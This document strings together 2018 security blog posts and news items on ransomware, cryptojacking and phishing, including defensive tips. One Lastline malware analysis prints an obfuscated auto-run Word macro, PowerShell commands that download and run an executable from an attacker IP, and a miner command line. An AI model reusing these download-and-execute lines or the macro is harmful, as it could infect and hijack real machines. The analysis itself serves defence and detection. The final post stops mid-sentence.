The Trojan ransomware Cryakl (Trojan-Ransom.Win32.Cryakl) has been . At first, it was distributed through attached archives in e-mails that appeared to come from an arbitration court in connection with some alleged wrongdoing. There is something about such messages that sets nerves to jangling, and even those who know better might be inclined to click on the attachment. Later, the e-mails diversified, looking like messages from other organizations, such as a local homeowners’ association.

When encrypting files on a victim’s computer, Cryakl creates a long key that it sends to a command-and-control C&C server. Without this key, it is nearly impossible to recover files impacted by the malware. After that, Cryakl replaces the desktop wallpaper with contact details for its creators together with a ransom demand. Cryakl also displays an image of the mask of the 1964 French movie villain Fantomas, hence its alternative name. Cryakl mostly targeted users in Russia, so information about it is mostly available in Russian.

Ransomware’s history and evolution in facts and figures

Success story

As we already said, the joint efforts of our experts and Belgian police resulted in obtaining the master keys. The investigation began when the computer crime unit learned about victims of the ransomware in Belgium, and then they discovered a C&C server in a neighboring country. An operation led by the Belgian federal prosecutor neutralized the server, along with several other C&C servers that received master keys from infected machines. Then Kaspersky Lab stepped in to assist the law enforcement agencies, not for the first time. As before, the results were first-class: Our experts helped analyze the data found and extract the decryption keys.

The keys have already been added to the RakhniDecryptor tool on the No More Ransom website, and the Belgian federal police is now an official partner of the project. No More Ransom, which has been running since July 2016, has to date provided free help to tens of thousands of people in decrypting files rendered unusable by ransomware, and deprived cyberblackmailers of at least 10 million euros of potential booty.

No More Ransom: A very productive year

How to rescue files encrypted by Cryakl ransomware

The No More Ransom site offers two tools for decrypting files corrupted by Cryakl. One, named RannohDecryptor and around since 2016, is for older versions of Cryakl. You can download it at NoMoreRansom.org, and get decryption instructions here.

We recently updated the second tool, RakhniDecryptor, by adding the master keys from the servers seized by the Belgian police. It can be downloaded from the same site; instructions are available here. RakhniDecryptor is needed to decrypt files hit by newer versions of Cryakl. Either one of the tools should restore Cryakl-infected files to full health.

How to stay safe in the future

When dealing with cryptoransomware, prevention is far cheaper and simpler than a cure. In other words, it’s better to secure yourself now and sleep easy than to mess around with file decryption. We’d like to share a few preemptive file protection tips:

1. Always keep a copy of your most important files somewhere else: in the cloud, on another drive, on a memory stick, or on another computer. More details about backup options are available here.

2. Use reliable AV software. Some security solutions — for example, Kaspersky Total Security — can also assist with file backup.

3. Don’t download programs from suspicious sources. Their installers might contain something you’d rather not have on your computer.

4. Don’t open attachments in e-mails from unknown senders, even if they look important and credible. If in doubt, look up the phone number on the organization’s official website and call to check.



Kaspersky Lab official blog

Cryakl Ransomware Decryption Keys Released by Belgian Federal Police

The Belgian federal police has released free decryption keys for Cryakl ransomware following an international law enforcement operation. On 9 February, the European Union Agency for Law Enforcement Cooperation (Europol) announced the release of the keys through No More Ransom. The move represents the culmination of an investigation that involved Belgian police, the Dutch National […]… Read More

The post Cryakl Ransomware Decryption Keys Released by Belgian Federal Police appeared first on The State of Security.

How to Avoid Ransomware in 5 Easy Steps

As you scroll through your social media feed, a window pops up: “Your hard drive has been encrypted. You have 48 hours to pay $200 or your data will be destroyed.” You see a link and instructions to “pay in Bitcoin.” An ominous looking timer counts down the seconds and minutes for the two-day window. Nine, eight, seven….  

Your thoughts immediately go to the contents of your hard drive — your daughter’s graduation video, your bank statements, a life insurance policy, pictures of your grandchildren — they all sit there, vulnerable, helpless bits of ones and zeros…and you don’t know what the heck bitcoin is.

Welcome to the world of ransomware — digital data hostage-taking only Hollywood could make up. Ransomware is a security threat for people and business, and cybersecurity experts predict it will only get worse in the future. One cause for its popularity is the profitability of the enterprise. Cyberthieves rake in millions every year with threats to destroy or encrypt valuable data if their ransoms aren’t paid.

You don’t need to be a millionaire or multinational corporation to be at risk. Cyberthieves also target the data of average consumers. When they target consumers, hackers may only request a few hundred dollars ransom but when the threat includes a thousand people, it makes for quite the lucrative venture. Many ransomware victims feel the risk of losing their data is too great, so they pay up. However, this only encourages the criminals.

The best way to combat ransomware is by not becoming a victim in the first place. To that end, here are five immediate steps you can take to avoid ransomware attacks.   

Step 1: Set Your Operating System to Automatically Update

The first step to avoiding ransomware is to update your operating system (OS). Anything connected to the web works better when it’s OS is updated. Tech companies like Microsoft and Apple regularly research and release fixes for “bugs” and security patches for vulnerabilities in their systems. It’s a cybersecurity game of cat and mouse. Cyberthieves search for “holes,” and companies race to find them first and “patch” them.

Users are key players in the game because they are the ultimate gatekeepers of their operating systems. If your OS isn’t up to date, you can’t take advantage of the security updates. Plus, your computer runs better with an updated OS.

Set your OS to update automatically and you won’t need to remember to do it manually. While Windows 10 automatically updates (you have no choice), older versions don’t. But setting auto updates are easy, whether you’re on a Mac or PC.  

Step 2: Screenshot Your Bank Emails

Cybercriminals use trojans or worms to infect your computer with ransomware. So avoiding these will help you avoid ransomware. Worms and trojan malware are often spread through phishing email scams, which trick users into opening email attachments containing viruses or clicking links to fake websites posed as legitimate ones.

One of the best tips for keeping phishing emails at bay is learning to identify them. Hackers send phishing emails that look like they come from banks, credit card companies, or the IRS. Phishing emails kickstart your fears and anxieties by suggesting there are “problems with your account” or insisting that “Urgent action is required.” Who wouldn’t be scared if their bank sent them an email saying, “You are overdrawn in your account.”

Cybercriminals use this fear to distract people so they will overlook the telltale signs of the phishing email like misspellings or common fear-inducing subject lines.     

Take screenshots of all of the legitimate emails from your bank, credit card companies, and others business that manage your sensitive information. Use these screenshots to compare with future emails you receive so you can spot phishing phonies and avoid ransomware.

Step 3: Bookmark Your Most Visited Websites

The next step in your ransomware avoidance journey is to bookmark all of your most visited websites. Just as with phishing emails, cybercriminals build websites that look like bank or credit card sites. Then they trick users into clicking a link and visiting them. From there, hackers steal your sign-in credentials or infect your computer with malware.

Think twice before you visit a website by clicking a link in an email, comments section, or private messaging app. Instead, bookmark your most visited or high-value websites and visit them through your browser.  

Step 4: Backup Your Data to the Cloud and a Hard Drive

This step is a no-brainer. Ransomware works if you only have one copy of your data. If it’s irretrievable, then cyberthieves have the upperhand, but if you have multiple copies, you have taken away the power behind the threat.

Back up your data to both a cloud service and a hard drive. That way, you have a copy that’s available anywhere there’s internet access and one that’s physically accessible all the time. Both types of storage are relatively inexpensive and will certainly prove worth it if you’re ever a ransomware target.

After backing up your data, set up a schedule so you can keep your data current. If you haven’t backed up your data in six months, you’re probably just as vulnerable to ransomware attacks as having no backup at all.

The post How to Avoid Ransomware in 5 Easy Steps appeared first on Panda Security Mediacenter.

Webroot Threat Blog: Cyber News Rundown: Scarab Ransomware Strikes Back

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst and a guy with a passion for all things security. Any questions? Just ask.

New Variant of Scarab Ransomware

With a few interesting changes to the original Scarab ransomware, Scarabey is quickly targeting Russian-speaking users with brute force attacks on unsecured RDP connections, rather than with the spam email campaigns used by its predecessor. Additionally, Scarabey takes the ransom a bit further by deleting 24 files from the encrypted machine for every 24 hours that the ransom remains unpaid.

Botnets Used to Spread Cryptocurrency Miners

Following the Shadow Brokers release of NSA exploits last summer, the use of EternalBlue continues with the latest trend of using the exploit to compromise machines and turn them into cryptocurrency miners. By expanding the botnet to cover over 500,000 unique machines, the attackers have successfully brought in more than $3 million since May of 2017. The use of such a large-scale botnet can effectively mine for the more resource-intensive currencies with ease and even disrupt businesses from their normal workflow for days at a time.

Bitcoin Ads Circumvent Facebook Ban

In the past week, Facebook officially implemented a ban on all cryptocurrency-related advertisements on their site. However, the ads have continued to appear for many users with characters in the phrase ‘bitcoin’ simply misspelled. The ban was initially set to block misleading financial services and products that unknowing users might click on due to the apparent legitimacy of the ads.

 

Do you live in one of the most-hacked states?

Mac Software Sites Distributing Crypto Miners

As crypto miners continue to gain popularity among cyber criminals, it was inevitable that they would begin focusing on Macs. MacUpdate, a well-known software download site, was recently found to be bundling miners with commonly used applications. Luckily, some of these bundles are poorly written and often fail to launch the decoy app, which is intended to draw users’ attention away from the malicious activity. To make matters worse, several other download sites were also affected and waited far too long to remove the malicious download links from their servers.

Tech Scammers Exploit Chrome Flaw

Tech scammers have long been the bane of legitimate software companies and their support teams. The latest trick, however, can easily bring an unsuspecting user to a full panic attack by simply rendering a Chrome browser completely unusable. First it displays an error message and then silently forces the browser to save a random file to disk at such a pace that the machine’s CPU maxes out and leaves the computer in a ‘locked’ state in the hopes that the victim will actually contact the phony support number being displayed.

The post Cyber News Rundown: Scarab Ransomware Strikes Back appeared first on Webroot Threat Blog.



Webroot Threat Blog

Microsoft & Google unable to detect new zero-day ransomware

The ShurL0ckr ransomware was able to avoid detection by a majority of anti-virus engines and cloud applications.As organisations have adopted cloud services to increase their productivity and agility, so to

The post Microsoft & Google unable to detect new zero-day ransomware appeared first on The Cyber Security Place.

Malicious Trends: Cryptojacking Could Surpass Ransomware as Primary Money Maker

Cryptocurrencies are hot. According to https://coinmarketcap.com, there are now over 1300 cryptocurrencies with new initial coin offerings (ICOs) accelerating all the time. Even Kodak is getting into the act with KODAKcoin. And currently, the price trajectory of Bitcoin is higher than a North Korean rocket, with Blockchain saving the world one application at a time. […]… Read More

The post Malicious Trends: Cryptojacking Could Surpass Ransomware as Primary Money Maker appeared first on The State of Security.

The State of Security: Malicious Trends: Cryptojacking Could Surpass Ransomware as Primary Money Maker

Cryptocurrencies are hot. According to https://coinmarketcap.com, there are now over 1300 cryptocurrencies with new initial coin offerings (ICOs) accelerating all the time. Even Kodak is getting into the act with KODAKcoin. And currently, the price trajectory of Bitcoin is higher than a North Korean rocket, with Blockchain saving the world one application at a time. […]… Read More

The post Malicious Trends: Cryptojacking Could Surpass Ransomware as Primary Money Maker appeared first on The State of Security.



The State of Security

What can businesses learn from the cyber threat landscape of 2017?

Over the course of 2017, global cyber threats continued to evolve at pace, resulting in a dramatic reshaping of the cyber security landscape. Traditional threats such as generic Trojans, ransomware

The post What can businesses learn from the cyber threat landscape of 2017? appeared first on The Cyber Security Place.

2017: Worst Year Ever for Data Loss and Breaches

Last year set the record for both the most breaches and the most data compromised in a year, as several new trends (like a surge in cloud storage misconfigurations) characterized

The post 2017: Worst Year Ever for Data Loss and Breaches appeared first on The Cyber Security Place.

A week in security (January 29 – February 04)

Last week on Labs, we looked into PUPs stealing and using mainstream logos of security and tech companies to further gain user trust, GandCrab and Scarab ransomware variants in the wild, and a new Mac malware called OSX.CreativeUpdater that can be distributed via MacUpdate. We also profiled robocalling and ransomware, particularly how ransomware was named the “It” malware of early- to mid-2017, and then began to fizzle like a dying firecracker at end of the year onwards.

Other news

Stay safe, everyone!

The post A week in security (January 29 – February 04) appeared first on Malwarebytes Labs.

Ransomware’s difficult second album

The last year has seen all manner of cybercrime, from scams and social engineering to malvertising and malspam. What’s interesting is that so many “next-gen,” sophisticated malware mainstays like exploits have dropped in popularity, while other more traditional types such as spyware have shot up dramatically —to the tune of an 882 percent increase in UK detections.

Meanwhile, here’s ransomware pretty much falling off a cliff, dropping as low as a 10 percent infection rate in December 2017:

Ransomware drop

Click to enlarge

Why is everyone jumping on the “I used spyware perfectly fine in 2007, and now I will again” bandwagon? Why is ransomware stagnating and tailing off? What omnipresent entity is dancing away behind the scenes, tying connections together and ensuring today’s attack news is yesterday’s old newspapers?

One of the answers, for me anyway, is Bitcoin.

(Digital) money makes the world go round

For many people in security circles (both victims and researchers), the first time coming across any mention of Bitcoin was through the payment demanded by ransomware authors. I have far too many memories of victims asking me what on Earth a Bitcoin was as they stared at the ransom screen blinking out from their computers. Bitcoin quickly became the payment method of choice over and above the formerly more common “send us an iTunes card code or wire us some money” demands.

From there, the professional criminal community fully embraced Bitcoin as the payment method of choice. They started utilizing TOR onion links to further anonymize the transaction, and layered on lots of other tactics that frankly required scammers to include FAQs in multiple languages just to ensure victims knew what they had to do next.

FAQ

Click to enlarge

Once the script kiddies and amateur hour developers saw the big players raking in Bitcoin cash, they decided they wanted some of the same. We then had lots of pieces of poorly designed, DIY ransomware. You couldn’t always guarantee files would be decrypted after payment, and often it was impossible to tell if this was done intentionally or by accident. Even some of the big names didn’t always do what they were supposed to do.

The weird thing about ransomware is that it relies on dishonest developers being, well, honest. If people are coughing up lots of money to get their files back and it isn’t happening, word of mouth and a rapid press response will ensure the law of diminishing returns kicks in. People will either get smart and back up their files or simply resign themselves to losing them. A nice little earner suddenly becomes a big pile of nothing. Or, to put it another way:

Get in the bin

For those wanting to ply their trade over a long time, this is, of course, not a good result.

The great ransomware fightback of 2017

Alongside bad developers and increased public visibility after some huge outbreaks 2017, advances in security tools have become better equipped to deal with ransomware threats. In addition, lots of standalone programs have been made by independent researchers to decrypt files. This increased awareness of ransomware prevention (backing up files, using security tools) alongside decreasing prices for file storage has really helped to defang the ransomware menace to some degree. It’s no longer the killer app it once was for scammers, and with a few precautions in place, it loses much of its power.

And then, at last, we come to the Bitcoins themselves. You don’t need me to tell you the price is simultaneously through the roof and in the toilet, on the kind of crazy rollercoaster ride you just can’t predict. Back in the days when they weren’t quite so highly valued, ransomware authors could afford to get away with asking for the odd coin or two. Now? Frankly, they’re taking a huge leap of faith that someone can summon up the cryptocash to get their files back.

There are many pieces of ransomware out there that can be controlled by Command & Control servers; new files can be downloaded as required, and, if needed, criminals can tweak values to more manageable figures. Trouble is, there’s no guarantee our malware-developing friend is sitting there monitoring the rise and fall and rise and rise and fall of Bitcoin. It’s also entirely possible they don’t really care if the coin value on display is a bit too much to pay, because another victim will be along in a minute.

As for the DIY/home-brew contingent? Everything may well be hardcoded into the file, with no way to alter it once it lurches into the wild. At that point, if they’re asking for four Bitcoins and the price triples overnight, there’s a good chance they won’t be getting any money out of it.

There are many other factors at play of course, but “we’re slowly strangling ourselves out of the market by asking for ridiculous amounts of money” is certainly a rather large warning sign.

Swings, roundabouts, and the path of least resistance

There is a cyclical nature to attacks. They tend to swing from stealth being the “in” thing, to overt displays of fireworks on your desktop, to covert action becoming the new (old) hotness, and so on. Back in the day, old-school adware vendors had their programs bundled alongside other spyware, and the desktop would be ablaze with pop-ups, pop-unders, sliders, extensions—you name it. The idea was to generate as many ad impressions as possible before the affiliate networks were shut down. A quick apology, “It’ll never happen again,” and sure enough, they’d be right back at it a few days later.

Once security tools and public awareness had reached a tipping point and big legal things started to happen, many vendors went broke or moved onto pastures new. Those that remained knew they had to go dark, and from about 2008 onward you started to see a lot less fireworks and a lot more invisible assassins. (Well, not see them, exactly, given they were invisible, but anyway.)

Stealthy malware and silent botnets clinging onto a PC as covertly as possible for as long as they could was the order of the day. Eventually, these methods, too, fell out of favour, and cybercriminals started to ramp up more visible scams in the form of the evergreen fake antivirus/tech support scams, and social engineering on social media portals.

We’re seeing a similar pattern now with ransomware. Ransomware catches plenty of victims out the gate, but not so much once everyone has wised up a little. If ransomware groups can’t even get their hands on Bitcoins by wandering into a victim’s home at 2am and loudly announcing the takeover of their PC, it’s surely a lot easier to jump on the cryptomining craze and return to the digital shadows.

mining

Click to enlarge

The advantages to moving into stealth mode are obvious. First, there are no more splashy takeovers. Splashy takeovers don’t last long on PCs these days. Second, the movement to covertly mine for coins using the victim’s GPU horsepower—without them knowing about it—has potential for longer-term gains. That’s the theory, at least; in reality, many people will notice fans spinning up, or computers under higher load or just plain old not responding. Even so, a lot of those people may just pass it off as “one of those things my computer does.” It’s a trade off, and not likely to make more money than kicking the door in and screaming for free coins, but it’s definitely a lot sneakier.

Finally, it’s a lot less hassle to just throw some script on a website, as opposed build the ransomware, pay some developers, mess around with onion sites, write up long FAQs for the victims, maintain C&C servers, ensure the decryption of hijacked files actually works, and so on. And cybercriminals delivering any kind of attack have noticed.

As we said in our blog on the 2017 State of Malware report:

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

It isn’t just scripts mining for coins in the background of low traffic, unknown websites, either. In the last few days, we’ve also seen signs of Google’s DoubleClick ads on Youtube serving as the launchpad for Coinhive mining scripts. If you’re hunting around for websites for your kids, you may well run into mining scripts there, too. This kind of furtive mining is a bit of a fast moving plague, and throws the old arguments over blocking ads while hurting publishers to the foreground once more.

And while we’re talking about paths of least resistance, there are many other types of scams taking aim at digital coins; the sky is the limit, and bad actors don’t seem worried about locking themselves into the same old tried and tested methods.

Everywhere you look, digital currency is causing headaches across the board. Malware miners. Fake wallets in official mobile stores. Covert scripts quietly gobbling up power cycles in the background. Gamers unable to buy graphics cards due to miners hogging stock, resulting in shops selling them at a discount with gaming components. Even fake fonts are in on the act.

fake fonts

Click to enlarge

Ransomware: not dead yet

Ransomware may be losing its cool factor, but it’s definitely not dead and buried—not by a long shot. Many ransomware authors appear to be in bit of a self-imposed time out. Except these guys aren’t feeling guilty. It’s more like “let’s see what horrible new thing we can come up with next.”

There are already a few signs of desperate, scorched-earth ransomware attack methods, with the so-called “SpriteCoin” hurling malware at victims once they’ve paid to recover their files. Elsewhere, we have ransomware effectively trying to cannibalize each other’s payments. This infighting certainly isn’t a good thing for the victims, especially when their payments are ending up with the wrong malware groups—nobody is getting their files back in that scenario. Stack that alongside the “bad” ransomware not decrypting files, and you have yet another reason why people will, eventually, choose not to pay.

The future may or may not be Bitcoin, but for now, it almost certainly isn’t ransomware. Give it time while the battle to establish exactly what ransomware is about plays out behind the scenes, though. Eventually, the pendulum always swings back.

The post Ransomware’s difficult second album appeared first on Malwarebytes Labs.

Watch out, cyber criminals are using fake FBI emails to infect your computer

The FBI Internet Crime Complaint Center (IC3) is warning of a new malware campaign aimed at infecting victims with weaponized attachments.

The Feds’ Internet Crime Complaint Center (IC3) is warning of a new spam campaign aimed at infecting victims with a ransomware. According to an alert issued on Wednesday by the IC3, numerous citizens filled complaints after received emails purporting to be from IC3. The message pretends to be the compensation from a cyber attack and asks the victims to fill the attached document, but the file is laced with malware.

The story is interesting, the email reports that a Nigerian cyber criminal had been arrested and feds have found the recipient’s email address of the alleged scammer’s PC. The email asks victims to return the document with recipient info and wait for the refund to arrive. Once the victim has opened the document, the infection process will start.

FBI

The FBI has identified at least three other versions of the IC3 impersonation scam:

  • “The first involved a fake IC3 social media page, which advertised itself as the FBI Cyber Crime Department (IC3) and requested recipients provide personal information in order to report an internet crime.” states the alert issued by the FBI. “
  • “The second involved an email which stated the recipient was treated unfairly by various banks and courier companies. The email claimed the recipient’s name was found in a financial company’s database and that they will be compensated for this unfair treatment.”
  • “The third example involved an email from the Internet Crime Investigation Center/Cyber Division and provided an address in Minneapolis, Minnesota. The email also included a case reference number in the subject line. The email informed the recipient that their IP address was referred to the IC3 as a possible victim of a federal cyber-crime. The email then requests the recipient to contact the sender via telephone.”

FBI is currently investigating the cases, victims of an online scam can file a complaint with the IC3 at www.ic3.gov.

 

Pierluigi Paganini

(Security Affairs – FBI, malware)

The post Watch out, cyber criminals are using fake FBI emails to infect your computer appeared first on Security Affairs.

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

The UK Information Commission's Office (ICO) heavily criticised the Carphone Warehouse for security inadequacies and fined the company £400K following their 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers, was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack", where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number Carphone Warehouse's security failures, which included the use of software that was six years out of day,  lack of “rigorous controls” over who had login details to systems; no antivirus protection running on the servers holding data, the same root password being used on every individual server, which was known to “some 30-40 members of staff”; and the needless storage of full credit card details. The Carphone Warephone should thank their lucky stars the breach didn't occur after the General Data Protection Regulation comes into force, as with such a damning list of security failures, the company may well have been fined considerably more by ICO, when it is granted vastly greater financial sanctions and powers when the GDPR kicks in May.

The National Cyber Security Centre warned the UK national infrastructure faces serious nation-state attacks, stating it is a matter of a "when" not an "if". There also claims that the cyberattacks against the Ukraine in recent years was down to Russia testing and tuning it's nation-state cyberattacking capabilities. 

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPeyta ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet, the hacker then moved currency into a different wallet platform.

In the United States, 
the Federal Trade Commission (FTC) fined toy firm VTech US$ 650,000 (£482,000) for violating a US children's privacy laws. The FTC alleged the toy company violated (COPPA) Children's Online Privacy Protection Rule by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high valued target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January,  the Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents have doubled in 2017 and 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both the professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and the number of attacks skyrocketed during the course of the year, no surprise there.  

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.

NEWS

AWARENESS, EDUCATION AND THREAT INTELLIGENCE

REPORTS

Smashing Security #063: Carole’s back!

Ss episode 63 thumb

Fitness trackers breaching your privacy, how anyone can create convincing celebrity porn, and how ransomware authors are getting ripped off by scammers.

All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, who are joined this week by special guest Maria Varmazis.

Ransomware And Cryptomining Spiked In 2017 According To Report

Spoiler alert: There are a lot of exploits and malware spreading online in an attempt to ruin your day. Year after year security vendors compile data to produce annual reports

The post Ransomware And Cryptomining Spiked In 2017 According To Report appeared first on The Cyber Security Place.

Smoke Loader Campaign: When Defense Becomes a Numbers Game

Authored by Alexander Sevtsov
Edited by Stefano Ortolani

Introduction

Everybody knows that PowerShell is a powerful tool to automate different tasks in Windows. Unfortunately, many bad actors know that it is also a sneaky way for malware to download its payload. A few days ago we stumbled upon an interesting macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16) that is making one too many assumptions about the underlying operating system, thus sometimes failing to execute.

The Malicious Document

The malicious document file consists of the following macro code:

Private Sub Document_Open()
    Dim abasekjsh() As Byte, bfjeslksl As String, izhkaheje As Long
    abasekjsh = StrConv(ThisDocument.BuiltInDocumentProperties(Chr(84) + Chr(105) + Chr(116) + 
Chr(108) + Chr(101)), vbFromUnicode)
    For izhkaheje = 0 To UBound(abasekjsh)
        abasekjsh(izhkaheje) = abasekjsh(izhkaheje) - 6
    Next izhkaheje
    bfjeslksl = StrReverse(StrConv(abasekjsh, vbUnicode))
    Shell (Replace(Replace(Split(bfjeslksl, "|")(1), Split(bfjeslksl, "|")(0), Chr(46)), 
"FPATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub

The macro itself is nothing special: it first reads the “Title” property by accessing the BuiltInDocumentProperties of the current document. The property value is then used to decode a PowerShell command line, which is eventually executed via the Shell method.

The PowerShell Downloader

Instead of using sophisticated evasion techniques, the malware relies on a feature available from PowerShell 3.0 onwards. To download the malicious code the command invokes the Invoke-WebRequest cmdlet:

powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile 
([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');powershell.exe -w 1 Start-Process -
Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');

This tiny detail has the side-effect of requiring Windows 8 and above for the command to complete successfully. Note that although PowerShell comes installed by default since Windows 7, PowerShell 3.0 is only available on Windows 7 as an optional update. Therefore any network activity can only be observed if the underlying operating system is at least Windows 8, or if Windows 7 has the specific update installed. In other words, the more diversity between our analysis environments, the more chances we can elicit the malicious behavior.

Payload – Smoke Loader

The payload is a variant of the Smoke Loader family (Figure 1) which shows quite a number of different activities when analyzed by the Lastline sandbox (sha1: f227820689bdc628de34cc9c21000f3d458a26bf):

Figure 1. Analysis overview of the Smoke Loader

As it often happens, signatures are not really informative as we can see in Figure 2.

Figure 2. VT detection of the Smoke Loader

The aim of this malware is to download other components by sending 5 different POST requests to microsoftoutlook[.]bit/email/send.php. While some are met with a 404 error, three are successful and download the following payloads:

  • GlobeImposter Ransomware eventually displaying the ransom note in Figure 3.
    Smoke Loader Ransom Note

    Figure 3. Ransom note of the GlobeImposter Ransomware delivered by the Smoke Loader.

  • Zeus trojan banker, also known as Zbot, capturing online banking sessions and stealing credentials from known FTP clients, such as FlashFXP, CuteFtp, WsFTP, FileZilla, BulletProof FTP, etc.
  • Monero CPU miner based on the open source XMRig project (as indicated by some of the strings included in the binary, see Figure 4). The command used to spawn the miner reveals some well-known pool id we have been seeing already:

wuauclt.exe -o stratum+tcp://ca.minexmr.com:443 -u 
49X9ZwRuS6JR74LzwjVx2tQRQpTnoQUzdjh76G3BmuJDS7UKppqjiPx2tbvgt27Ru6YkULZ
4FbnHbJZ2tAqPas12PV5F6te.smoke30+10000 -p x --safe

Figure 4. XMRig Monero CPU miner

Intelligence

It’s worth mentioning that it’s not the first time we have seen the IP address from which the loader is downloaded. Based on our intelligence records, another malicious VBA-based document file (sha1: 03a06782e60e7e7b724a0cafa19ee6c64ba2366b) called a similar PowerShell script that perfectly executed in a default Windows 7 installation:

powershell $webclient = new-object System.Net.WebClient;
$myurls = 'http://80.82.67[.]217/moo.jpg'.Split(',');
$path = $env: temp + '\~tmp.exe';
foreach($myurl in $myurls) {
    try {
        $webclient.DownloadFile($myurl.ToString(), $path);
        Start-Process $path;
        break;
    } catch {}
}

This variant downloads the payload by invoking the DownloadFile method from the System.Net.WebClient class, indeed a much more common (and backward compatible) approach to retrieve a remote resource.

Mitigation

There is an inherent problem with dynamic analysis: which version of the underlying operating system should be used? To address this issue, the Lastline engine is capable of running deep behavioral analysis on several different operating systems, increasing the probability of a successful execution. Moreover, application bundles (see previous article for more details) can be further used to shape the analysis environment when additional requirements are needed to elicit the malicious behavior.

Figure 5 shows what the analysis overview looks like when analyzing the sample discussed in this article: besides some reported structural anomalies, which are detected by our static document analysis, we can see that dynamic behaviors are exhibited only in Windows 10.

Figure 5. Analysis overview of the malicious macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16)

divider-2-whiteConclusion

In this article, we analyzed a malicious macro-based document relying on a specific version of PowerShell, thereby delivering a highly sophisticated multi-component malware, Smoke Loader. This is achieved by calling a cmdlet normally not available on PowerShell as installed in Windows 7, showing once more that operating system diversity is a key requirement for successful dynamic analysis.

Appendix: IoCsdivider-2-white

Files
The Malicious Document b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16
Smoke Loader f227820689bdc628de34cc9c21000f3d458a26bf
Monero CPU Miner 88eba5d205d85c39ced484a3aa7241302fd815e3
Zeus Trojan 54949587044a4e3732087a56bc1d36096b9f0075
GlobeImposter Ransomware f3cd914ba35a79317622d9ac47b9e4bfbc3b3b26
Network
80.82.67[.]217
107.181.254[.]15
Smoke Loader C&C microsoftoutlook[.]bit

The post Smoke Loader Campaign: When Defense Becomes a Numbers Game appeared first on Lastline.

Scarab ransomware: new variant changes tactics

The Scarab ransomware was discovered in June 2017. Since then, several variants have been created and discovered in the wild. The most popular or widespread versions were distributed via the Necurs botnet and initially written in Visual C compiled. However, after unpacking, we’ve found that another variant discovered in December 2017, called Scarabey, is distributed a little differently, with a different payload code as well.

Scarabey, like most ransomware, is designed to demand a Bitcoin payment from its victims after encrypting files on their systems. However, instead of being distributed via Necurs malspam like the original Scarab, Scarabey was found targeting Russian users and being distributed via RDP/manual dropping on servers and systems.

In addition, Scarabey seems to not be packed in any samples we have come across. The malicious code is written in Delphi without the C++ packaging that Scarab has and the content and language of the ransom notes are different for each.

SAMPLES BEING REFERENCED
SCARAB ORIGINAL: e8806738a575a6639e7c9aac882374ae
SCARABEY VARIANT: 9a02862ac95345359dfc3dcc93e3c10e

The ransom notes

As far as the victim is concerned, the main difference between Scarabey and other Scarab ransomware is the language of the ransom note and the scare tactic used in the encryption message.

In the Scarab sample, the ransom note is written in English, however, it reads as if you translated word-for-word a Russian text into English, without knowing proper English grammar or syntax. Scarabey, on the other hand, is written in Russian. What’s interesting is that when you throw the Scarabey note into Google translate, as I have done below, it contains the same grammatical errors as the Scarab note.

Scarab ransom note

Original Scarab message

Scarabey message, translated from Russian to English with Google translate

This is more proof that that the authors of Scarab are likely Russian speakers who had written the note in their native language and run it through a translator to be added into the Scarab code. It would then seem quite likely that, since they decided to target Russians. they released the Scarabey note in their native language to cover more victims.

Different threats

In the original Scarab versions, it warns: The longer the user waits, the more the price will go up.

For Scarabey, on the other hand, it tells users that for every day they wait, more and more files will be deleted, until there are no more files left for them to recover.

Essentially, the criminals are implying that they have copies of the unencrypted files to give back to the user, or that they have control of the victim computer to delete files. This is not true for a few reasons:

